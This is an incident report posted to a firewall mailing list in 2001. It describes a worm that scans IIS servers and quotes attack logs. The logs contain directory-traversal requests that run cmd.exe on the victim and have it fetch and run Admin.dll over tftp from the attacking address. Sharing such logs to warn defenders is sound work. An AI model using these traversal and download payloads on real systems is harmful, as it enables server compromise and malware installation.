I haven't been able to get a copy of the worm yet, but
it scans IIS machines for vulnerabilities able to run
cmd.exe?\dir+c, then if that works, sends an attempt
to run tftp back to itself and grab "Admin.dll", then
run it.
Here are some logs:
Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\Admin.dll
HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET
/scripts/..%252f../Admin.dll HTTP/1.0
Jim Hutchins
Sandia
----------------------------------------------------------------
James A. Hutchins Phone: 1-925-294-2416
Sandia National Laboratories FAX: 1-925-294-1225
P.O. Box 969, MS9011 EMail: [EMAIL PROTECTED]
Livermore, CA 94551-0969
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
